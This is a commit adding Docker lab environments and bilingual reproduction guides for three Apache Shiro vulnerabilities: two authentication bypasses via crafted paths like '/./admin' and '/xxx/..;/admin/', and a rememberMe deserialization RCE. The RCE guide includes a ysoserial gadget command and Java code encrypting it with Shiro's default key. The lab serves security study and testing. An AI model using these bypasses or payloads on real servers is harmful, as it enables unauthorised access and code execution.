first commit

shiro/CVE-2010-3863/README.md

@@ -0,0 +1,33 @@
+# Apache Shiro Authentication Bypass Vulnerability (CVE-2010-3863)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache Shiro is a powerful and easy-to-use Java security framework that performs authentication, authorization, cryptography, and session management.
+
+Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the `/./`, `/../`, `/`, `//` URI.
+
+References:
+
+- <https://github.com/apache/shiro/commit/ab8294940a19743583d91f0c7e29b405d197cc34>
+- <https://xz.aliyun.com/t/11633#toc-2>
+- <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3863>
+
+## Vulnerable Environment
+
+Start an application with Spring and Shiro 1.0.0 by executing the following command.
+
+```
+docker compose up -d
+```
+
+Once the environment is started, visit ``http://your-ip:8080`` to see the home page.
+
+## Vulnerability Reproduce
+
+A direct request to the admin page `/admin` is inaccessible and will be redirected to the login page.
+
+![](1.png)
+
+Construct a malicious request `/./admin` to bypass authentication checks and access the admin page.
+
+![](2.png)

shiro/CVE-2010-3863/README.zh-cn.md

@@ -0,0 +1,31 @@
+# Apache Shiro 认证绕过漏洞（CVE-2010-3863）
+
+Apache Shiro是一款开源安全框架，提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用，同时也能提供健壮的安全性。
+
+在Apache Shiro 1.1.0以前的版本中，shiro 进行权限验证前未对url 做标准化处理，攻击者可以构造`/`、`//`、`/./`、`/../` 等绕过权限验证
+
+参考链接：
+
+- <https://github.com/apache/shiro/commit/ab8294940a19743583d91f0c7e29b405d197cc34>
+- <https://xz.aliyun.com/t/11633#toc-2>
+- <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3863>
+
+## 环境搭建
+
+执行如下命令启动一个搭载Shiro 1.0.0的应用：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080`即可查看首页。
+
+## 漏洞复现
+
+直接请求管理页面`/admin`，无法访问，将会被重定向到登录页面：
+
+![](1.png)
+
+构造恶意请求`/./admin`，即可绕过权限校验，访问到管理页面：
+
+![](2.png)

shiro/CVE-2010-3863/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ web:
+   image: vulhub/shiro:1.0.0
+   ports:
+    - "8080:8080"

shiro/CVE-2016-4437/README.md

@@ -0,0 +1,67 @@
+# Apache Shiro 1.2.4 Deserialization Remote Code Execution (CVE-2016-4437)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache Shiro is a powerful and easy-to-use Java security framework that performs authentication, authorization, cryptography, and session management.
+
+In Apache Shiro 1.2.4 and earlier versions, encrypted user information is serialized and stored in a cookie named "remember-me". Attackers can forge user cookies using Shiro's default key, triggering a Java deserialization vulnerability that allows arbitrary command execution on the target machine.
+
+## Environment Setup
+
+Execute the following command to start a Web application using Apache Shiro 1.2.4:
+
+```
+docker compose up -d
+```
+
+After the server starts, visit `http://your-ip:8080` and you can log in using the credentials `admin:vulhub`.
+
+## Vulnerability Reproduction
+
+Use ysoserial to generate a CommonsBeanutils1 Gadget:
+
+```
+java -jar ysoserial-master-30099844c6-1.jar CommonsBeanutils1 "touch /tmp/success" > poc.ser
+```
+
+Encrypt the payload using Shiro's built-in default key:
+
+```java
+package org.vulhub.shirodemo;
+
+import org.apache.shiro.crypto.AesCipherService;
+import org.apache.shiro.codec.CodecSupport;
+import org.apache.shiro.util.ByteSource;
+import org.apache.shiro.codec.Base64;
+import org.apache.shiro.io.DefaultSerializer;
+
+import java.nio.file.FileSystems;
+import java.nio.file.Files;
+import java.nio.file.Paths;
+
+public class TestRemember {
+    public static void main(String[] args) throws Exception {
+        byte[] payloads = Files.readAllBytes(FileSystems.getDefault().getPath("/path", "to", "poc.ser"));
+
+        AesCipherService aes = new AesCipherService();
+        byte[] key = Base64.decode(CodecSupport.toBytes("kPH+bIxk5D2deZiIxcaaaA=="));
+
+        ByteSource ciphertext = aes.encrypt(payloads, key);
+        System.out.printf(ciphertext.toString());
+    }
+}
+```
+
+Then send the following request with the payload in the rememberMe cookie:
+
+```
+GET / HTTP/1.1
+Host: your-ip:8080
+Cookie: rememberMe=<encrypted_payload>
+
+
+```
+
+You will see the `touch /tmp/success` command has been executed:
+
+![](1.png)

shiro/CVE-2016-4437/README.zh-cn.md

@@ -0,0 +1,64 @@
+# Apache Shiro 1.2.4 反序列化漏洞（CVE-2016-4437）
+
+Apache Shiro是一款开源安全框架，提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用，同时也能提供健壮的安全性。
+
+Apache Shiro 1.2.4及以前版本中，加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie，触发Java反序列化漏洞，进而在目标机器上执行任意命令。
+
+## 漏洞环境
+
+执行如下命令启动一个使用了Apache Shiro 1.2.4的Web服务：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问`http://your-ip:8080`可使用`admin:vulhub`进行登录。
+
+## 漏洞复现
+
+使用ysoserial生成CommonsBeanutils1的Gadget：
+
+```
+java -jar ysoserial-master-30099844c6-1.jar CommonsBeanutils1 "touch /tmp/success" > poc.ser
+```
+
+使用Shiro内置的默认密钥对Payload进行加密：
+
+```java
+package org.vulhub.shirodemo;
+
+import org.apache.shiro.crypto.AesCipherService;
+import org.apache.shiro.codec.CodecSupport;
+import org.apache.shiro.util.ByteSource;
+import org.apache.shiro.codec.Base64;
+import org.apache.shiro.io.DefaultSerializer;
+
+import java.nio.file.FileSystems;
+import java.nio.file.Files;
+import java.nio.file.Paths;
+
+public class TestRemember {
+    public static void main(String[] args) throws Exception {
+        byte[] payloads = Files.readAllBytes(FileSystems.getDefault().getPath("/path", "to", "poc.ser"));
+
+        AesCipherService aes = new AesCipherService();
+        byte[] key = Base64.decode(CodecSupport.toBytes("kPH+bIxk5D2deZiIxcaaaA=="));
+
+        ByteSource ciphertext = aes.encrypt(payloads, key);
+        System.out.printf(ciphertext.toString());
+    }
+}
+```
+
+然后发送包含加密Payload的rememberMe Cookie：
+
+```
+GET / HTTP/1.1
+Host: your-ip:8080
+Cookie: rememberMe=<encrypted_payload>
+
+```
+
+可见，`touch /tmp/success`命令已执行：
+
+![](1.png)

shiro/CVE-2016-4437/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ web:
+   image: vulhub/shiro:1.2.4
+   ports:
+    - "8080:8080"

shiro/CVE-2020-1957/README.md

@@ -0,0 +1,46 @@
+# Apache Shiro Authentication Bypass Vulnerability (CVE-2020-1957)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache Shiro is a powerful and easy-to-use Java security framework that performs authentication, authorization, cryptography, and session management.
+
+In versions of Apache Shiro prior to 1.5.2 with the Spring dynamic controller, an attacker can construct a maliciously crafted request using `..;` to bypass the directory authentication.
+
+Reference links:
+
+- <https://github.com/apache/shiro/commit/3708d7907016bf2fa12691dff6ff0def1249b8ce#diff-98f7bc5c0391389e56531f8b3754081aL139>
+- <https://xz.aliyun.com/t/8281>
+- <https://blog.spoock.com/2020/05/09/cve-2020-1957/>
+
+## Vulnerability environment
+
+Start an application with Spring 2.2.2 and Shiro 1.5.1 by executing the following command.
+
+```
+docker compose up -d
+```
+
+Once the environment is started, visit ``http://your-ip:8080`` to see the home page.
+
+The configuration of URL permissions in this application is as follows.
+
+``` java
+@Bean
+public ShiroFilterChainDefinition shiroFilterChainDefinition() {
+    DefaultShiroFilterChainDefinition chainDefinition = new DefaultShiroFilterChainDefinition();
+    chainDefinition.addPathDefinition("/login.html", "authc"); // need to accept POSTs from the login form
+    chainDefinition.addPathDefinition("/logout", "logout");
+    chainDefinition.addPathDefinition("/admin/**", "authc");
+    return chainDefinition;
+}
+```
+
+## Exploit
+
+A direct request to the admin page `/admin/` is inaccessible and will be redirected to the login page.
+
+![](1.png)
+
+Construct a malicious request `/xxx/..;/admin/` to bypass authentication checks and access the admin page.
+
+![](2.png)

shiro/CVE-2020-1957/README.zh-cn.md

@@ -0,0 +1,44 @@
+# Apache Shiro 认证绕过漏洞（CVE-2020-1957）
+
+Apache Shiro是一款开源安全框架，提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用，同时也能提供健壮的安全性。
+
+在Apache Shiro 1.5.2以前的版本中，在使用Spring动态控制器时，攻击者通过构造`..;`这样的跳转，可以绕过Shiro中对目录的权限限制。
+
+参考链接：
+
+- <https://github.com/apache/shiro/commit/3708d7907016bf2fa12691dff6ff0def1249b8ce#diff-98f7bc5c0391389e56531f8b3754081aL139>
+- <https://xz.aliyun.com/t/8281>
+- <https://blog.spoock.com/2020/05/09/cve-2020-1957/>
+
+## 环境搭建
+
+执行如下命令启动一个搭载Spring 2.2.2与Shiro 1.5.1的应用：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080`即可查看首页。
+
+这个应用中对URL权限的配置如下：
+
+```java
+@Bean
+public ShiroFilterChainDefinition shiroFilterChainDefinition() {
+    DefaultShiroFilterChainDefinition chainDefinition = new DefaultShiroFilterChainDefinition();
+    chainDefinition.addPathDefinition("/login.html", "authc"); // need to accept POSTs from the login form
+    chainDefinition.addPathDefinition("/logout", "logout");
+    chainDefinition.addPathDefinition("/admin/**", "authc");
+    return chainDefinition;
+}
+```
+
+## 漏洞复现
+
+直接请求管理页面`/admin/`，无法访问，将会被重定向到登录页面：
+
+![](1.png)
+
+构造恶意请求`/xxx/..;/admin/`，即可绕过权限校验，访问到管理页面：
+
+![](2.png)

shiro/CVE-2020-1957/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ web:
+   image: vulhub/shiro:1.5.1
+   ports:
+    - "8080:8080"